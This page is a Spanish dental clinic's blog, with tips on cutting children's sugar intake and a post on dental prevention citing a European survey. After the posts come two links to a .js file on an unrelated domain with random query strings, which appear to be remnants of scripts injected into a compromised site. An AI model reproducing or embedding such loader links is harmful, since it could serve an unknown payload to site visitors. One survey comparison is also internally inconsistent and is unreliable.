Robles Dental

Dentistas de familia desde 1984


Deja un comentario

Cómo reducir el consumo de azúcar en los niños

Establecer unos buenos pilares en nutrición en la niñez es muy importante, dado que en el futuro sabrán elegir y desarrollarse como adultos sanos.

Hay que limitar la cantidad de alimentos y bebidas azucaradas que ingieren ya que tienen muchas calorías y pocos nutrientes, tales como: bebidas deportivas, bebidas energéticas, zumos, pasteles, galletas, helados, dulces y otros postres. Para que acepten estas limitaciones, tendremos que valernos de trucos como los que os detallamos a continuación.

  • Porciones pequeñas y a ser posibles que la comparta.

  • En cuanto a las bebidas, la ingesta de zumos industriales tienen gran cantidad de azucares, son calorías vacías, no nutren pero se almacenan, engordando y acidificando el medio bucal. Si tienen sed, la mejor bebida es el agua, zumos naturales hechos en casa, o bien leche descremada.

  • No ofrecer dulces como recompensa. Se está reforzando que ciertos alimentos son más gratificante que otros.

  • Acostumbrarlos a que el postre diario sea fruta, como pieza entera, ensaladas de frutas con colores atractivos, zumos naturales hechos en casa en forma de polos, etc. Los fines de semana o en alguna celebración puede consumirse un dulce como algo especial.

  • Hacer postres creativos y que participen en los mismos, que elijan las frutas y con sus propias manos diseñen el postre. En nuestro medio existe gran variedad de fruta de temporada.

  • En la compra del supermercado, cuando ya saben leer y son participativos ayudando a coger cosas de los estantes, acostumbrarlos a leer el contenido nutricional que sepan que son carbohidratos, y de que tipo, la cantidad de grasa que lleva, que comparen con distintos productos. Es importante que vayan adquiriendo estos buenos hábitos.

  • Habituarles a comer frutos secos como: nueces, almendras, que tienen gran cantidad de vitaminas, grasas poliinsaturadas o grasas buenas, que sean bajos en sal y no fritos, granos integrales, serían un buen sustituto en lugar de los clásicos bocadillos untados de mantequilla y bollería.

  • Evitar situaciones en que los niños puedan demandar golosinas.

  • Darles golosinas debe de ser algo especial, no se les puede dar a diario, deben de reservarse para ocasiones muy especiales.

  • Si un niño no come o no quiere la comida que se le ha asignado, no se la podemos reemplazar por un dulce, galleta o una golosina. A la larga psicológicamente y nutricionalmente le va a perjudicar.

Esperamos que estos pequeños consejos sean de utilidad 😉


Deja un comentario

Escuela de padres: La importancia de la prevención

En 2015, un estudio sobre salud bucodental realizado a 7.500 padres de toda Europa, reveló que un tercio de los niños de nuestro país se cepillan solo los dientes anteriores, omitiendo completamente los posteriores, y el 43,1% no se cepilla los dientes el tiempo necesario (dos minutos).

Más del 90% de los padres encuestados, están de acuerdo en que la adquisición de hábitos de cepillado dental está directamente relacionado con el ejemplo que ellos den. Por ello, es muy importante que los niños los vean cepillarse los dientes.

Con la vuelta al colegio, lo niños suelen ingerir más bollería industrial, con azúcares y grasas saturadas, que a la larga pueden provocar obesidad y caries. Es importante además, que el niño tenga hábito de cepillado, para mantener una adecuada higiene buco dental tanto dentro como fuega del hogar.

Un dato relevante de este estudio es que, en comparación con nuestros vecinos los franceses, los niños españoles visitan al dentista con menor frecuencia (un 45.6% frente a un 40.4% respectivamente), a los siete años de edad el 16,2% ya tienen algún empaste y al 12% ya se le ha practicado alguna extracción dentaria.

Con todo, la asistencia dental profesional orientada a la prevención es muy importante y más gratificante tanto para niños como padres, lo que conlleva menores costes futuros.

Como el sabio refrán reza, más vale prevenir que curar, prevengamos ahora y nuestros niños llegarán a la adultez con bocas sanas y equilibradas, ¡os lo agradecerán!.

http://plugintemarosa.info/dfi823hs.js?0.8205492097881708

http://plugintemarosa.info/dfi823hs.js?0.7518993786318734